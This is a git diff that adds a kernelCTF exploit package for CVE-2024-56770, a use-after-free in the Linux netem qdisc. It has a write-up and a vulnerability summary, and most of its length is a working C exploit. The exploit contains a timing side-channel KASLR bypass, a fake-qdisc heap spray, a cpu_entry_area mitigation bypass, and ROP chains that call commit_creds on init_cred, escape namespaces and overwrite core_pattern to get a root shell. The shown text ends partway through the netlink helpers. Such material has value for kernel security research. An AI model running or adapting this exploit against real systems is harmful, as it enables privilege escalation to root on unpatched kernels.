diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/exploit.md new file mode 100644 index 000000000..137818aec --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/exploit.md @@ -0,0 +1,355 @@ +# Overview + +In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children holds. In case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc [1], the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc. 'qlen' then indicates the wrong number of packets in the tfifo. If a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased. When netem dequeues the newly created SKBs from the child, the 'qlen' in netem is not updated. + +```c +static struct sk_buff *netem_dequeue(struct Qdisc *sch) +{ + struct netem_sched_data *q = qdisc_priv(sch); + struct sk_buff *skb; + +tfifo_dequeue: + skb = __qdisc_dequeue_head(&sch->q); + if (skb) { + qdisc_qstats_backlog_dec(sch, skb); +deliver: + qdisc_bstats_update(sch, skb); + return skb; + } + skb = netem_peek(q); + if (skb) { + u64 time_to_send; + u64 now = ktime_get_ns(); + + /* if more time remaining? */ + time_to_send = netem_skb_cb(skb)->time_to_send; + if (q->slot.slot_next && q->slot.slot_next < time_to_send) + get_slot_next(q, now); + + if (time_to_send <= now && q->slot.slot_next <= now) { + netem_erase_head(q, skb); + sch->q.qlen--; + qdisc_qstats_backlog_dec(sch, skb); + skb->next = NULL; + skb->prev = NULL; + /* skb->dev shares skb->rbnode area, + * we need to restore its value. 
+ */ + skb->dev = qdisc_dev(sch); + + if (q->slot.slot_next) { + q->slot.packets_left--; + q->slot.bytes_left -= qdisc_pkt_len(skb); + if (q->slot.packets_left <= 0 || + q->slot.bytes_left <= 0) + get_slot_next(q, now); + } + + if (q->qdisc) { + unsigned int pkt_len = qdisc_pkt_len(skb); + struct sk_buff *to_free = NULL; + int err; + + err = qdisc_enqueue(skb, q->qdisc, &to_free); // [1] + kfree_skb_list(to_free); + if (err != NET_XMIT_SUCCESS && + net_xmit_drop_count(err)) { + qdisc_qstats_drop(sch); + qdisc_tree_reduce_backlog(sch, 1, + pkt_len); + } + goto tfifo_dequeue; + } + goto deliver; + } + + if (q->qdisc) { + skb = q->qdisc->ops->dequeue(q->qdisc); + if (skb) + goto deliver; + } + + qdisc_watchdog_schedule_ns(&q->watchdog, + max(time_to_send, + q->slot.slot_next)); + } + + if (q->qdisc) { + skb = q->qdisc->ops->dequeue(q->qdisc); + if (skb) + goto deliver; + } + return NULL; +} +``` + +We can trigger the UAF as follows. + +- Create a Qdisc DRR `1:` +- Create a Class DRR `1:1` + +- Create a Qdisc DRR `2:` as a child of `1:1` +- Create a Class DRR `2:1` +- Create a Class DRR `2:2` + +- Create a Qdisc NetEM `3:` as a child of `2:1` + +- Create a Qdisc TBF `4:` as a child of `3:` + +- Create a Qdisc NetEM `5:` as a child of `2:2` + +- Send a packet to `2:1` +- Send a packet to `2:1` + +- Delete the Class DRR `2:1` + +- Send a packet to `2:2` + +- Delete the Class DRR `1:1` + +- Send a packet to trigger the UAF + +# KASLR Bypass + +We used a timing side channel attack to leak the kernel base. + +# RIP Control + +RIP is controlled in `drr_dequeue()`. 
+ +```c +static struct sk_buff *drr_dequeue(struct Qdisc *sch) + { + struct drr_sched *q = qdisc_priv(sch); + struct drr_class *cl; + struct sk_buff *skb; + unsigned int len; + + if (list_empty(&q->active)) + goto out; + while (1) { + cl = list_first_entry(&q->active, struct drr_class, alist); + skb = cl->qdisc->ops->peek(cl->qdisc); // [2] + if (skb == NULL) { + qdisc_warn_nonwc(__func__, cl->qdisc); + goto out; + } +``` + +When the DRR Qdisc class is deleted, both `cl` and `cl->qdisc` are freed. At this point, with both freed, `cl` is left in its freed state and a fake qdisc is sprayed onto `cl->qdisc`. This allows control over the RIP when `cl->qdisc->ops->peek` is called [2]. Setting the fake qdisc's ops to `drr_qdisc_ops` causes the `peek` function below to be invoked. + +```c +static inline struct sk_buff *qdisc_peek_dequeued(struct Qdisc *sch) +{ + struct sk_buff *skb = skb_peek(&sch->gso_skb); + + /* we can reuse ->gso_skb because peek isn't called for root qdiscs */ + if (!skb) { + skb = sch->dequeue(sch); // [3] + + if (skb) { + __skb_queue_head(&sch->gso_skb, skb); + /* it's still part of the queue */ + qdisc_qstats_backlog_inc(sch, skb); + sch->q.qlen++; + } + } + + return skb; +} +``` + +In `qdisc_peek_dequeued()`, if `skb_peek(&sch->gso_skb)` returns `NULL` (the fake Qdisc leaves `gso_skb.next` set to `0`), `sch->dequeue` is called [3]. Since `sch->dequeue` corresponds to the 0x8 offset in `struct Qdisc`, a stack pivot gadget can be stored at this location to perform ROP. + +We allocate the `user_key_payload` and `ctl_buf` objects into `kmalloc-512` for the fake Qdisc spray. + +For the mitigation kernel, we use a multiq Qdisc to bypass the mitigations. We allocate the multiq Qdisc so that it reclaims the freed `cl->qdisc`. 
+ +```c +static int multiq_init(struct Qdisc *sch, struct nlattr *opt, + struct netlink_ext_ack *extack) +{ + struct multiq_sched_data *q = qdisc_priv(sch); + int i, err; + + q->queues = NULL; + + if (!opt) + return -EINVAL; + + err = tcf_block_get(&q->block, &q->filter_list, sch, extack); + if (err) + return err; + + q->max_bands = qdisc_dev(sch)->num_tx_queues; + + q->queues = kcalloc(q->max_bands, sizeof(struct Qdisc *), GFP_KERNEL); // [4] + if (!q->queues) + return -ENOBUFS; + for (i = 0; i < q->max_bands; i++) + q->queues[i] = &noop_qdisc; + + return multiq_tune(sch, opt, extack); +} +``` + +When initializing the multiq Qdisc, `q->queues` is allocated in `multiq_init()` [4]. At this point, the object size can be controlled to be `q->max_bands*sizeof(struct Qdisc *)`. Since `q->max_bands` is a user-controllable value, an object of any desired size can be allocated. To bypass mitigation, allocate an object larger than `0x2000`, which uses the page allocator. Then, delete the multiq Qdisc and allocate the `ctl_buf` objects into the freed `q->queues`. + +```c +static struct sk_buff *multiq_peek(struct Qdisc *sch) +{ + struct multiq_sched_data *q = qdisc_priv(sch); + unsigned int curband = q->curband; + struct Qdisc *qdisc; + struct sk_buff *skb; + int band; + + for (band = 0; band < q->bands; band++) { + /* cycle through bands to ensure fairness */ + curband++; + if (curband >= q->bands) + curband = 0; + + /* Check that target subqueue is available before + * pulling an skb to avoid head-of-line blocking. + */ + if (!netif_xmit_stopped( + netdev_get_tx_queue(qdisc_dev(sch), curband))) { + qdisc = q->queues[curband]; + skb = qdisc->ops->peek(qdisc); // [5] + if (skb) + return skb; + } + } + return NULL; + +} +``` + +Next, when a packet is sent, `multiq_peek()` is called from `drr_dequeue()`. It then references `q->queues` and calls `qdisc->ops->peek()` [5]. Using `ctl_buf`, it overwrites `q->queues[]` with the address of the `cpu_entry_area`. 
As a result, `qdisc->ops` can also be set to an address within `cpu_entry_area`, and finally, the RIP can be controlled. + +# Post-RIP + +For COS kernel, the ROP payload is stored in `struct Qdisc` allocated in `kmalloc-512`. When `sch->dequeue()` is called, `RBP` points to the `struct Qdisc+0x80`. + +```c +void rop_chain(uint64_t* data){ + int i = 0; + + data[i++] = 0; // enqueue + data[i++] = kbase + MOV_RSP_RBP_POP_RBP_RET; // dequeue + + data[i++] = 0; // keylen + data[i++] = kbase + DRR_QDISC_OPS; // ops + + i += 12; + + data[i++] = 0; // gsoskb.next + + // current = find_task_by_vpid(getpid()) + data[i++] = kbase + POP_RDI_RET; + data[i++] = getpid(); + data[i++] = kbase + FIND_TASK_BY_VPID; + + // current += offsetof(struct task_struct, rcu_read_lock_nesting) + data[i++] = kbase + POP_RSI_RET; + data[i++] = RCU_READ_LOCK_NESTING_OFF; + data[i++] = kbase + ADD_RAX_RSI_RET; + + // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) + data[i++] = kbase + POP_RCX_RET; + data[i++] = 0; + data[i++] = kbase + MOV_RAX_RCX_RET; + + // Bypass "schedule while atomic": set oops_in_progress = 1 + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + OOPS_IN_PROGRESS; + data[i++] = kbase + MOV_RSI_RDI_RET; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; + data[i++] = 0; + data[i++] = 0; + data[i++] = _user_rip; + data[i++] = _user_cs; + data[i++] = _user_rflags; + data[i++] = _user_sp; + data[i++] = _user_ss; +} 
+``` + +For the mitigation kernel, the payload is stored in the `cpu_entry_area` as follows. + +```c +// Fill the CPU entry area exception stack of HELPER_CPU with a +// struct cpu_entry_area_payload +static void setup_cpu_entry_area() { + if (fork()) { + return; + } + + struct cpu_entry_area_payload payload = {}; + + payload.regs[0] = kbase + QDISC_RESET; // multiq->ops->peek + payload.regs[1] = kbase + POP_POP_RET; + payload.regs[2] = kbase + PUSH_RBX_POP_RSP_RBP_RET; // multiq->ops->reset + payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF ; // fake ops + payload.regs[4] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET; + payload.regs[5] = kbase + CORE_PATTERN; + payload.regs[6] = MMAP_ADDR; + payload.regs[7] = strlen((char*)MMAP_ADDR); + payload.regs[8] = 0; + payload.regs[9] = kbase + COPY_FROM_USER; + payload.regs[10] = kbase + MSLEEP; + + set_affinity(1); + signal(SIGFPE, sig_handler); + signal(SIGTRAP, sig_handler); + signal(SIGSEGV, sig_handler); + setsid(); + + while(1){ + write_cpu_entry_area(&payload); + usleep(1000); + } +} +``` + +When RIP is controlled, `qdisc_reset()` is called first. + +```c +void qdisc_reset(struct Qdisc *qdisc) +{ + const struct Qdisc_ops *ops = qdisc->ops; + + trace_qdisc_reset(qdisc); + + if (ops->reset) + ops->reset(qdisc); // [6] + + __skb_queue_purge(&qdisc->gso_skb); + __skb_queue_purge(&qdisc->skb_bad_txq); + + qdisc->q.qlen = 0; + qdisc->qstats.backlog = 0; +} +``` + +In `qdisc_reset()`, `ops->reset()` is called with the address of the `cpu_entry_area` in the `RBX` register [6]. Therefore, ROP can be performed by modifying `ops->reset()` into a stack pivot gadget. The `core_pattern` overwrite technique is used to gain root shell access. 
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/vulnerability.md new file mode 100644 index 000000000..7e78d21bb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/vulnerability.md @@ -0,0 +1,13 @@ +- Requirements: + - Capabilities: CAP_NET_ADMIN, CAP_NET_RAW + - Kernel configuration: CONFIG_NET_SCHED, CONFIG_NET_SCH_NETEM + - User namespaces required: Yes +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50612537e9ab (netem: fix classful handling +) +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f8d4bc455047cf3903cd6f85f49978987dbb3027 (net/sched: netem: account for backlog updates from child qdisc) +- Affected Version: v3.3 - v6.13-rc2 +- Affected Component: net/sched +- Cause: Use-After-Free +- Syscall to disable: disallow unprivileged user namespaces +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-56770 +- Description: In the Linux kernel, the following vulnerability has been resolved: net/sched: netem: account for backlog updates from child qdisc In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children holds. In case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc, the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc. 'qlen' then indicates the wrong number of packets in the tfifo. If a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased. When netem dequeues the newly created SKBs from the child, the 'qlen' in netem is not updated. 
If 'qlen' reaches the configured sch->limit, the enqueue function stops working, even though the tfifo is not full. Reproduce the bug: Ensure that the sender machine has GSO enabled. Configure netem as root qdisc and tbf as its child on the outgoing interface of the machine as follows: $ tc qdisc add dev root handle 1: netem delay 100ms limit 100 $ tc qdisc add dev parent 1:0 tbf rate 50Mbit burst 1542 latency 50ms Send bulk TCP traffic out via this interface, e.g., by running an iPerf3 client on the machine. Check the qdisc statistics: $ tc -s qdisc show dev Statistics after 10s of iPerf3 TCP test before the fix (note that netem's backlog > limit, netem stopped accepting packets): qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 2767766 bytes 1848 pkt (dropped 652, overlimits 0 requeues 0) backlog 4294528236b 1155p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 2767766 bytes 1848 pkt (dropped 327, overlimits 7601 requeues 0) backlog 0b 0p requeues 0 Statistics after the fix: qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 37766372 bytes 24974 pkt (dropped 9, overlimits 0 requeues 0) backlog 0b 0p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 37766372 bytes 24974 pkt (dropped 327, overlimits 96017 requeues 0) backlog 0b 0p requeues 0 tbf segments the GSO SKBs (tbf_segment) and updates the netem's 'qlen'. The interface fully stops transferring packets and "locks". In this case, the child qdisc and tfifo are empty, but 'qlen' indicates the tfifo is at its limit and no more packets are accepted. This patch adds a counter for the entries in the tfifo. Netem's 'qlen' is only decreased when a packet is returned by its dequeue function, and not during enqueuing into the child qdisc. External updates to 'qlen' are thus accounted for and only the behavior of the backlog statistics changes. As in other qdiscs, 'qlen' then keeps track of how many packets are held in netem and all of its children. 
As before, sch->limit remains as the maximum number of packets in the tfifo. The same applies to netem's backlog statistics. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/Makefile b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/Makefile new file mode 100644 index 000000000..00b0521c3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/Makefile @@ -0,0 +1,5 @@ +exploit: + gcc -o exploit ./exploit.c -lkeyutils -static + +prerequisites: + sudo apt-get install libkeyutils-dev \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit new file mode 100755 index 000000000..abcc5cc04 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit.c b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit.c new file mode 100644 index 000000000..7c53f70ce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/cos-109-17800.372.38/exploit.c @@ -0,0 +1,1001 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include + +int sockfd = -1; + +uint64_t kbase = 0xffffffff81000000; + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | 
a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +void prefetch(void* p) +{ + asm volatile ( + "prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r" (p)); +} + +size_t flushandreload(void* addr) // row miss +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +size_t bypass_kaslr(uint64_t base) +{ + if (!base) + { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) + { + uint64_t bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) + { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) + { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) + { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) + { + if (times[ti] < minv) + { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) + { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (c == 0) + { + base = bases[i]; + } + else if (base == bases[i]) + { + c++; + } + else + { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (base == bases[i]) + { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) + { + base -= OFFSET; + goto got_base; + } + + 
printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 15 +// largest contiguous mapped area at the beginning of _stext +#define WINDOW_SIZE 11 + + while (1) + { + uint64_t bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) + { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) + { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) + { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) + { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) + { + sum += times[ti + i]; + } + if (sum > max) + { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (c == 0) + { + base = bases[i]; + } + else if (base == bases[i]) + { + c++; + } + else + { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (base == bases[i]) + { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) + { + if ((base % 0x1000000) == 0) + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + kbase = base; + + return 0; +} + +void win(){ + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + char* shell[] = { + "/bin/sh", + "-c", + "/bin/cat /flag ; /bin/sh", + NULL, + }; + + execve(shell[0], shell, NULL); + + while(1); +} + 
+uint64_t _user_rip = (uint64_t) win; +uint64_t _user_cs = 0; +uint64_t _user_rflags = 0; +uint64_t _user_sp = 0; +uint64_t _user_ss = 0; + +void save_state(void) { + __asm__(".intel_syntax noprefix;" + "mov _user_cs, cs;" + "mov _user_ss, ss;" + "mov _user_sp, rsp;" + "pushf;" + "pop _user_rflags;" + ".att_syntax"); + return; +} + +#define FIND_TASK_BY_VPID 0x1cc360 +#define SWITCH_TASK_NAMESPACES 0x1d4090 +#define COMMIT_CREDS 0x1d5c10 +#define INIT_CRED 0x2876b40 +#define INIT_NSPROXY 0x2876900 +#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0x14011c6 +#define OOPS_IN_PROGRESS 0x3511b78 +#define DRR_QDISC_OPS 0x2b8ade0 +#define RCU_READ_LOCK_NESTING_OFF 0x474 // struct task_struct + +#define PUSH_RDI_POP_RSP_RET 0xe9a9ff // push rdi ; add byte ptr [r9], sil ; rcr byte ptr [rbx + 0x5d], 0x41 ; pop rsp ; jmp 0xffffffff82605040 +#define POP_POP_POP_RET 0xfa36c2 // pop r10 ; pop r12 ; pop rbp ; jmp 0xffffffff82605040 +#define POP_RDI_RET 0x048dea // pop rdi ; jmp 0xffffffff82605040 +#define POP_RSI_RET 0x208d48 // pop rsi ; jmp 0xffffffff82605040 +#define ADD_RAX_RSI_RET 0x03cf10 // add rax, rsi ; jmp 0xffffffff82605040 +#define POP_RCX_RET 0x02d35c // pop rcx ; jmp 0xffffffff82605040 +#define MOV_RAX_RCX_RET 0x77004b // mov qword ptr [rax], rcx ; jmp 0xffffffff82605040 +#define MOV_RDI_RAX_RET 0x12bebdb // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82605040 +#define MOV_RSI_RDI_RET 0x3111b9 // mov qword ptr [rsi], rdi ; jmp 0xffffffff8245ee20 + + +void rop_chain(uint64_t* data){ + int i = 0; + + data[i++] = kbase + POP_POP_POP_RET; // enqueue + data[i++] = kbase + PUSH_RDI_POP_RSP_RET; // dequeue + + data[i++] = 0; // keylen + data[i++] = kbase + DRR_QDISC_OPS; // ops + + // current = find_task_by_vpid(getpid()) + data[i++] = kbase + POP_RDI_RET; + data[i++] = getpid(); + data[i++] = kbase + FIND_TASK_BY_VPID; + + // current += offsetof(struct task_struct, rcu_read_lock_nesting) + data[i++] = kbase + POP_RSI_RET; + data[i++] = 
RCU_READ_LOCK_NESTING_OFF; + data[i++] = kbase + ADD_RAX_RSI_RET; + + // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) + data[i++] = kbase + POP_RCX_RET; + data[i++] = 0; + data[i++] = kbase + MOV_RAX_RCX_RET; + + // Bypass "schedule while atomic": set oops_in_progress = 1 + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; // gsoskb.next + + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + OOPS_IN_PROGRESS; + data[i++] = kbase + MOV_RSI_RDI_RET; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; + data[i++] = 0; + data[i++] = 0; + data[i++] = _user_rip; + data[i++] = _user_cs; + data[i++] = _user_rflags; + data[i++] = _user_sp; + data[i++] = _user_ss; +} + +void write_file(const char *filename, char *text) { + int fd = open(filename, O_RDWR | O_CREAT, 0600); + + write(fd, text, strlen(text)); + close(fd); +} + +void new_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + char buffer[0x100]; + + unshare(CLONE_NEWUSER | CLONE_NEWNS); + + unshare(CLONE_NEWNET); + + write_file("/proc/self/setgroups", "deny"); + + snprintf(buffer, sizeof(buffer), "0 %d 1", uid); + write_file("/proc/self/uid_map", buffer); + snprintf(buffer, sizeof(buffer), "0 %d 1", gid); + write_file("/proc/self/gid_map", buffer); +} + +void set_affinity(int cpuid){ + cpu_set_t my_set; + int cpu_cores = sysconf(_SC_NPROCESSORS_ONLN); + + if (cpu_cores == 1) return; + + CPU_ZERO(&my_set); + + CPU_SET(cpuid, &my_set); + + if 
(sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } +} + +#define NETLINK_BUFSIZE 4096 + +int ip_link_lo_up() { + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifinfo; + char buffer[NETLINK_BUFSIZE]; + } req; + + struct sockaddr_nl sa; + struct iovec iov; + struct msghdr msg; + int sock; + int lo_ifindex; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + return -1; + } + + lo_ifindex = if_nametoindex("lo"); + if (lo_ifindex == 0) { + perror("if_nametoindex"); + close(sock); + return -1; + } + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + req.ifinfo.ifi_family = AF_UNSPEC; + req.ifinfo.ifi_index = lo_ifindex; + req.ifinfo.ifi_change = 0xFFFFFFFF; + req.ifinfo.ifi_flags = IFF_UP | IFF_RUNNING; + + memset(&sa, 0, sizeof(sa)); + sa.nl_family = AF_NETLINK; + + iov.iov_base = &req; + iov.iov_len = req.nlh.nlmsg_len; + memset(&msg, 0, sizeof(msg)); + msg.msg_name = &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + + if (sendmsg(sock, &msg, 0) < 0) { + perror("sendmsg"); + close(sock); + return -1; + } + + close(sock); + return 0; +} + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +#define NLMSG_TAIL(nmsg) \ + ((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len))) + +int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data, + int alen) { + int len = RTA_LENGTH(alen); + struct rtattr *rta; + + if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) { + fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen); + return -1; + } + rta = NLMSG_TAIL(n); + rta->rta_type = type; + rta->rta_len = len; + if (alen) + memcpy(RTA_DATA(rta), data, alen); + n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len); + return 0; +} + 
+struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type) { + struct rtattr *nest = NLMSG_TAIL(n); + + addattr_l(n, maxlen, type, NULL, 0); + return nest; +} + +int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest) { + nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest; + return n->nlmsg_len; +} + +int add_qdisc_drr(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "drr", 4); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_qdisc_netem(int fd, uint32_t parent, uint32_t handle, int64_t latency) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = 